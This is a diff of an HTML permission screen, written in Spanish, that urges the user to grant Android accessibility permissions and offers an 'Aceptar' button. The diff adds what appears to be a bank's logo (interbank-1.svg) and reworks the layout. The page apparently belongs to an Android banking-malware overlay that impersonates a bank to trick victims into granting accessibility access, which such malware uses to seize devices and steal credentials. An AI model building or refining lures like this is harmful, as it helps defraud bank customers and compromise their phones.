--- a/accessibility.html
+++ b/accessibility.html
@@ -13,21 +13,20 @@
 <body>
   <div class="container permiso">
     <div class="block block1">
+      <img class="logo" src="./public/interbank-1.svg" alt="Logo">
       <h2 class="permiso-title">Permiso</h2>
       <img class="permiso-img" alt="" src="./public/attentionmarklinedrawingsvgrepocom-1.svg" />
     </div>
-    <div class="block">
-      <div>
-        <h4 class="permiso-text">
-          Es importante otorgar permisos de accesibilidad a una aplicación de
-          Android para permitir que todos los usuarios puedan utilizarla de manera
-          efectiva y acceder a todas sus funcionalidades
-        </h4>
-        <button class="permiso-btn" onclick="clickgiveaccess()">
-          <b class="">Aceptar</b>
-        </button>
-      </div>
-  
+    <div class="block permiso-block-2">
+      <h4 class="permiso-text">
+        Es importante otorgar permisos de accesibilidad a una aplicación de
+        Android para permitir que todos los usuarios puedan utilizarla de manera
+        efectiva y acceder a todas sus funcionalidades
+      </h4>
+      <button class="permiso-btn" onclick="clickgiveaccess()">
+        <b class="">Aceptar</b>
+      </button>
+
     </div>
 
   </div>
